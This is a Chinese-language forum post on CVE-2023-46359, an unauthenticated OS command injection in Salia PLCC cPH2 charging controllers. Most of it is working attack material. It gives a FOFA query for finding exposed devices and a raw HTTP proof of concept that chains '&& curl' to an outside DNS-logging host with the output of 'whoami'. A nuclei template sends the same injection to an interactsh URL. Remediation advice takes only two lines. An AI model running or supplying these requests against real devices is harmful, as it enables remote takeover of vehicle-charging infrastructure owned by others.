Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)

我是大白   ·   发表于 2024-03-14 15:12:31   ·   漏洞文章

Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)

漏洞描述

Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞,该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。

产品界面

fofa语法

"Salia PLCC"

POC

  1. GET /connectioncheck.php?ip=127.0.0.1+%26%26+curl+http:%2F%2Fip.port.xxx.dnslog.pw/`whoami` HTTP/1.1
  2. Host:
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
  4. Content-Length: 0

nuclei验证

  1. id: CVE-2023-46359
  2. info:
  3. name: Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)
  4. author: nobody
  5. severity: critical
  6. description: |
  7. Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞,该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。
  8. impact: |
  9. 攻击者可远程执行系统命令
  10. remediation: |
  11. 升级版本,输入严格过滤
  12. metadata:
  13. verified: true
  14. max-request: 3
  15. fofa-query: "Salia PLCC"
  16. tags: CVE-2023-46359
  17. requests:
  18. - raw:
  19. - |
  20. @timeout:20s
  21. GET /connectioncheck.php?ip=127.0.0.1+%26%26+curl+curl+http:%2F%2F{{interactsh-url}} HTTP/1.1
  22. Host: {{Hostname}}
  23. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
  24. Content-Length: 0
  25. matchers-condition: and
  26. matchers:
  27. - type: word
  28. part: interactsh_protocol
  29. name: dns
  30. words:
  31. - "dns"
  32. - type: word
  33. part: body
  34. words:
  35. - "SUCCESS"
  36. - type: status
  37. status:
  38. - 200

修复建议

  • 建议升级到最新版本
  • 对输入传参做严格过滤

打赏我,让我更有动力~

0 条回复   |  直到 8个月前 | 333 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.